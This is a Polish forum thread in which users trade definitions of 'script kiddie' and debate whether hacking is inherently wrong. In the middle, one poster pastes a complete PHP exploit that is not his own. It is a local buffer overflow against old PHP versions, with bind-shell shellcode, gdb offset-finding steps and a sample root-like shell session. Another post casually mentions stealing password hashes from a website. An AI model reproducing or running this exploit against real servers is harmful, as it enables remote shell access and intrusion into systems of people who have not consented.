Definicja script-kiddie

[TQM]

Hej!

Na poczatku zaznacze - prosze TYLKO o Wasze definicje a nie klotnie ktora definicja jest lepsza... Jesli zauwaze cos takiego bede kasowal posty...


Chodzi mi o wyjasnienie terminu script-kiddie i poznanie Waszych definicji a nie wszczynanie wojen... Poza tym mam dziwne wrazenie ze skorzysta na tym wiecej osob... oczywiscie ten watek ma swoj cel, wiec czekam na Wasze definicje.


Definicja script-kiddie z ktora sie zgadzam wyglada mniej wiecej tak:

Script kiddie to niedoswiadczony atakujacy (bo do hackera to jeszcze bardzo daleko), ktory uzywa skryptow (exploitow) napisanych ludzi od niego sprytniejszych, sam nie rozumiejac zasady ich (skryptow) dzialania.

Jakie inne definicje macie/znacie/wyznajecie?

[ble34]

czym dlamnie są sk
to stali bywalcy bugtraqów wykorzytujący prace innych
często nieznający języków programowania
a ich ogólne pojęcie o temacie bezpieczenstwa to podstwy podstaw
dla mnie to troche głupawe jest
jeszce niedawno tez mne kręciła modyfikacja treści na cudzie stronie
albo odpalenie jakiegos exploita na winde
ale ostatnio wyciągnełem hasła z pewnei wytryny w postaci zaszyfrowanei md5
zrobiłem zrut ekranu i poszłem spać
nobo poco mam marnowac czas na rozkodowanie tych haseł?
tylko poto zeby wkleic obrazek na stronie kolesia
przecież to obłuda
niepowiększy to mojej wiedzy
bo zhakowac strona tak naprawede może każdy kto zna podstawy
wystarczy wejśc na bugtraq
znaleść podatną strone i odpalić exploit
naszcęści z bycia sk się wyrasta

[Porter3]

wg mnie to ludzie, którzy używają skryptów i programów napisanych przez innych, o których nie mają zielonego pojęcia jak działają. Potem się chwalą tym jaki zrobili wyczyn.

To ludzie w stylu: "Chciałbym program, gdzie podam IP i nacisnę HACKUJ"... A czasem się zdarza, ze ten IP to 127.0.0.1. ...

Sam kiedyś spróbowałem sobie Caina i "węszyłem". Ale to nie powód do dumy.

Uważam też, że prawie każdy choć przez chwilę był scipt-kiddie.

[ble34]

a właściwie zkąd takie pytanie wogóle?

[Mad_Dud]

Stopień poziomu doświadczenia w znajomości zagadnień bezpieczeństwa.
Wiedza wymagana do osiągnięcia tego stopnia:
podstawowa znajomość języków (głównie scriptingu - z tąd nazwa) bash, php, python, owk wykorzystywanych głównie do ataków na źle zabezpieczone serwery typu *nix.
Script-Kiddies potrafią znaleść w internecie potrzebne im programy/skrypty, przerobić je na własne potrzeby i uruchomić.

[ble34]

to 90% forum to skrypciarze
ja to wszystko umie nieuwarzam się za zkrypciarza
oczywiście za hakera tez nie ani za lame
mnie to poprostu kręci
ale zchęcią posłucham otym kto jest kim
wsród nas
ech dałem sie wciagnąć w definiowanie beznadzieinych zjawisk
tak naprawde to nieiwem kto jest hakerem ,skrypciarzem ,lamerem
może ja jestem skrypciarzem według czyis krteriów
a moze nie
ale koniec końców guzik mnie to obchodzi
apozatym czy sadzisz ze języki skryptowe sa takie proste
to alboe jesteś wybitny albo znasz ich podstawy
poszukaj sobie zródeł chodzby php
naprawde mozna znich dużo wykszesac
pozatym jedyne uproszcenie w stosunku do jezyków kompilowanych jakie znam to to ze chyba we wszytkich
żutowanie typów zmiennych jest atomatyczne no i alokacja pamięci tak to się chyba okresla
bo w kompilowanych
to najbardziei mnie denrewuje
pozatym wielkich rróznic niewidze
wszytkie wymagaja myslenia w miare logicznego

np napisać aplikacje podatna na bo
w php i wexploiyowac albo śmignąc sobie phpmyadmin
albo napisać exploit na cokolwiek
wcale niejst tak prosto jak by mogło sie wydawać no nie?
troche zboczyłem z tematu

[w4j]

nie zgodzę się z wami. Wszyscy wypowiadają się o SK z pewną pogardą. A to nie o to chodzi. Żeby chociażby odpalić jakiś expliot trzeba mieć wiedzę o wiele większą niż przeciętny użytkownik PC. Do tego można się wiele przy tym nauczyć. No ale oczywiście to jest złe bo uzyskujesz dostęp do informacji, do których dostępu nie powinieneś mieć itd., ale co nie jest złe? Przecież hakerstwo z założenia jest złe(i tylko nie mówicie mi o tym że haker to osoba, której tylko zależy na powiększaniu swojej wiedzy...). Przecież ktoś znajduje dziury i ktoś pisze exploity nie po to by ludzie zobaczyli jego prace i powiedzieli "o fajnie nowy exploit, ciekawe kiedy załatają tą dziurę. A tymczasem idę zrobić sobie herbatę", tylko po to by ludzie ich używali. Resztę dopiszę dzisiaj, ale w godzinach wieczornych bo jakoś mi brak natchnienia.

[eMCe]

ble34 masz rację i sie z tobą zgadzam każdy pewnie zerka w bugtraq ale na szczęście są one pisane tak żeby jak najbardziej utrudnić życie sk - czy to hex'em czy pokazując linijkę kodu na który powinno się zwrócić uwagę - nio oczywiście niestety nie wszystkie...

Nie odrazy Rzym zbudowano!

Nie wyobrażam sobie znaleźć Bug w jakiejś popularnej aplikacji bez wcześniejszego zaznajomienia się z innymi bugami - zobaczenia źle napisanego skryptu itp...

fakt faktem nieraz potrzebna jest jakaś dopałka - jakaś podpowiedź od strony doświadczonych - w tym również jakieś gotowe rozwiązanie - nie wiem jak dla was ale dla mnie jeden konkretny przykład jest lepszy niż 1000 kursów i książek - byle by go w należyty sposób wykorzystać (ten przykład)....

kto jest SK - ten co weźmie exploita odpali narozrabia i czuje się z tego dumny...

kto nie jest SK (a właściwie jest początkowo SK ale z tego wyrasta) ten co weźmie exploit odpali narozrabia i stwierdzi że wszystko fajnie ale ja chce wiedzieć czemu mi sie udało przejąć tą kontrolę nad innym hostem - siądzie sobie w nocy jak starsi śpią - odpali kompa przeczyta FAQ i co sie da żeby się nauczyć podstaw - potem weźmie się za naukę jakiegoś języka programowania - a jak mu nie idzie to się zapyta coś na forum ale w sposób mądry używając jakiegoś fachowego języka a nie zmyślając jakąś historyjek jaki to on biedny i poszkodowany i pomóżcie mu...
a i przede wszystkim nie poddadzą się po pierwszym napotkanym problemie...

a i jeszcze jedno chyba najważnejsze zdanie które chcę powiedzieć:

Dodam że może troszkę kontrowersyjnie będzie ale to moje zdanie i tyle!

Dzieci jak dzieci. Ktoś za nie jest odpowiedzialny! Czyżby rodzice?
Tylko kto tu jest rodzicami? Dla mnie ci którzy piszą kolejne FAQ w których pokazują kroczek po kroczku co gdzie kliknąć żeby się włamać!

Czy widzicie sens pisania takich FAQ, robienia filmików i wrzucania na rapida czy na youtobe? Fakt faktem większość nich jest robione przez SK którzy zobaczyli gdzieś podobny zauczyli się jak się to robi i 'wydali' własny niejako przypisując sobie prawo autorskie i zyskując szacunek w oczach kolejnych Sk którzy myślą że ten co zrobil fimik to haker pierwsza klasa!

Ale przecież ktoś musiał najpierw taki filmik stworzyć - ktoś kto miał wiedzę...
Po co żeby zaistnieć w sieci a jego nick był znany wśród SK ?

Wszystko dla ludzi - edukacja ok - ale czy taka osoba jest gotowa wziąć odpowiedzialność za to w jaki sposób może wykorzystać filmik widz - przecież wystarczy napisać jedno magiczne zdanie które chyba każdy zna i nie ma sensu go cytować...

Dla mnie powinny istnieć FAQ które opisują coś w sposób wymagający wiedzy, inteligencji i myślenia od czytelnika! - nio cuż za pięknie by chyba było..

Przy czym żeby nie było nie jasności - nie chcę tu rozbijać 'hakerów' na elitę i SK - wręcz przeciwnie uważam że elita powinna przekazywać zdobytą wiedzę kolejnym pokolenia - inaczej polska scena administracyjna będzie... a właściwie wcale jej nie bedzie a potem się dziwić że do bazy NFZ każdy ma dostęp bo Admin po prostu zapomniał założyć hasła (sprawa z gorionem jak ktoś pamięta)

Hehe - jak to pisze to dochodze do wniosku że chyba chce z polski utopie zrobić - nio cóż moje zdanie to moje zdanie - tyle mi przynajmniej wolno mieć

Ps. jak ktoś to wszystko przeczytał i nie zasnął to niezła śruba jest albo robokop pozdrówka

[ble34]

Kod php:

<?
/***********************************************************
 * hoagie_php_sscanf.php
 * PHP <= 4.4.3 / 5.1.4 local buffer overflow exploit
 *
 * howto get offsets:
 * (set $base_addr to 0x41414141)
 * # ulimit -c 20000
 * # /etc/init.d/apache restart
 * (execute script via web browser)
 * # tail /var/log/apache/error.log
 * ...
 * [Wed Aug 16 15:07:10 2006] [notice] child pid 28222 exit signal Segmentation fault (11), possible coredump in /tmp
 * ...
 * $ gdb /usr/sbin/apache /tmp/core
 * ...
 * ...
 * #0  0x40422b2d in php_sscanf_internal () from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/250 $edx
 * ...
 * 0x83ae16c:      0x41414141      0x41414141      0x41414141      0x41414141
 * 0x83ae17c:      0xdeadbabe      0x41414145      0x4141415d      0x00000001
 *                                 ^^^^^^^^^^
 *                                 start of our buffer (0x83ae180) = $base_addr
 * 0x83ae18c:      0x00000008      0x4141415d      0x0833d248      0x00000400
 * 0x83ae19c:      0x909006eb      0x90909090      0xe3f7db31      0x435366b0
 *                                                 ^^^^^^^^^^
 *                                                 start of shell code (0x83ae1a4)
 * 0x83ae1ac:      0x89534353      0x80cd4be1      0x6652c789      0x43204e68
 * 0x83ae1bc:      0xe1895366      0xd0f6efb0      0x89575150      0xcd66b0e1
 * 0x83ae1cc:      0x4366b080      0x5080cd43      0xe1895750      0xcd66b043
 * 0x83ae1dc:      0x89d98980      0x2c6fb0c3      0x80cd4930      0x51f6e241
 * 0x83ae1ec:      0x732f6e68      0x2f2f6868      0xe3896962      0xe1895351
 * 0x83ae1fc:      0xd0f6f4b0      0x414180cd      0x41414141      0x41414141
 * 0x83ae20c:      0x41414141      0x41414141      0x41414141      0x41414141
 * ...
 * (gdb) quit
 * #
 * (change $base_addr in exploit and now call url again)
 * # gdb /usr/sbin/apache /tmp/core
 * #0  0x40475e73 in _efree ()
 * from /usr/lib/apache/1.3/libphp4.so
 * (gdb) x/4w $ebp
 * 0xbfffb018:     0xbfffb038      0x40484241      0x0812a2f4      0xbfffb038
 *                                 ^^^^^^^^^^
 *                                 return address (return address location = 0xbfffb01c)
 * (change $rec_log in exploit and call url again)
 * $ telnet 127.0.0.1 20000
 * Trying 127.0.0.1...
 * Connected to localhost.
 * Escape character is '^]'.
 * id;
 * uid=33(www-data) gid=33(www-data) groups=33(www-data)
 * exit;
 * Connection closed by foreign host.
 * $
 *
 * NOTE: Because of PHP memory allocation this exploit depends on filename, pathname
 *       content etc... (because each line/byte will change emalloc() behavior
 *
 * Credits: Heintz (discovered this bug)
 *          BigHawk (bind shell code)
 *          Greuff (void.at)
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
 * CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
 * DAMAGE DONE USING THIS PROGRAM.
 *
 * VOID.AT Security
 * [email protected]
 * http://www.void.at
 *
 ************************************************************/

   /* base_addr for buffer in memory */
   $base_addr = 0x812a260;
   $base_addr_fill = 0x16;
   /* byte 0 = fill up, byte 1 = refcount, byte 2 = is_ref, byte 3 = type */
   $zval_attr = 0x00000008;
   /* will be overwritten to execute our shellcode */
   $ret_loc = 0xbfffb01c;
   /* just for searching */
   $pattern = 0xdeadbabe;

   function long2str($addr) {
      return pack("V", $addr);
   }

   $data =
         /* fill up memory */
          str_repeat(long2str($base_addr), $base_addr_fill) .
          /* pattern */
          long2str($pattern) .
         /* current = base_addr */
      long2str($base_addr + 0x4) .    
          /* *current = _zval_struct */
      /* _zval_struct */
      /* _zvalue_value */
      /* _zvalue_value.str.val */
          long2str($base_addr + 0x10 + 0xc) .
      /* _zvalue_value_str.len */
      long2str(0x00000001) .
      /* _zval_struct.type, _zval_struct.is_ref, _zval_struct.refcount */
          long2str($zval_attr) .
      /* _zend_mem_header */
      /* _zend_mem_header.pNext = start of shellcode  */
          long2str($base_addr + 28) .
      /* _zend_mem_header.pLast */
          long2str($ret_loc) .
      /* zend_mem_header.size, zend_mem_header.cached */
      long2str(0x000000400) .
      /* jump over next six bytes */
      "\xeb\x06\x90\x90" .
      /* this bytes will be overwritten by efree() */
      "\x90\x90\x90\x90" .
      /* shell code starts here -
       * BigHawk bind() version - just a little update to get rid
       * of 0x3f
       */
      "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd" .
      "\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef" .
      "\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43" .
      "\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89" .
      "\xc3\xb0\x6f\x2c\x30\x49\xcd\x80\x41\xe2\xf6\x51\x68\x6e\x2f" .
      "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\xf4" .
      "\xf6\xd0\xcd\x80" .
      /* fill up memory */
      str_repeat(long2str($base_addr), $base_addr_fill);

   /* fill up memory with emalloc() for sscanf() */
   quotemeta($data);

   /* trigger exploit */
   sscanf($data, '%1$s', $str);
?>

to jest php dla mnie wszxytko jasne i mówienie ze języki skryptowe to domena sk
to ignorancja oczywiście exploit niejest mój

[TQM]

Hmmmm...

Przecież hakerstwo z założenia jest złe(i tylko nie mówicie mi o tym że haker to osoba, której tylko zależy na powiększaniu swojej wiedzy...).

Ty masz chlopie jakies pojecie spaczone... widac za duzo telewizji... Hacker to osoba o znacznej wiedzy, ktora dzieki tej wiedzy wlasnie potrafi zrobic rzeczy ktorych inni nie potrafia, bo hacker zna istote problemu od podszewki - tak jak konstruktor a nie uzytkownik urzadzenia.

Czy hacker jest zly? Wiedza nie jest zla - zly moze byc sposob jej uzycia. Bron nie zabija ludzi... ludzie zabijaja ludzi...

kto jest SK - ten co weźmie exploita odpali narozrabia i czuje się z tego dumny...

... i przypisuje sobie nie swoje zaslugi - zrobilem to i tamto... taaaaa, jaaaaasne - to zrobil exploit ktorego uzyles a nie Ty... i to jest wlasnie roznica...

- "Sluchajcie chlopaki, ale dym... normalnie odjazd... Ten sasiad co nas wkurzal mial kompa hehe... teraz siedzi i reinstaluje. Wczoraj sie wbilem i takiedo dymu narobilem ze teraz nic mu nie zostalo tylko reinstalka"
- "Hahahaha... dobre dobre... a jak sie wbiles? Niezly jestes!"
- "No.... sluchajcie ile sie nameczylem zeby znalezc ta dziure no i dziala, nie zawsze ale dziala..."
- "A gdzie ta dziura?"
- "No w Windows no..."
- "No to to wiem, dokladniej chce wiedziec"
- "W google se poszukaj cwaniaku... wystarczy sciagnac exploita i juz - to takie proste"

Kazdy zaczyna od exploitow na pewnym etapie... ale jesli chce miec efekty w ten sposob i nie zadaje sobie trudu zrozumienia jak dziala eksploit i dlaczego dany software da sie w ten sposob zaatakowac (bo to sa 2 polowki ktore do siebie idealnie pasuja a jedna bez drugiej nie ma sensu) to taka osoba bedzie jedynie glupim SK...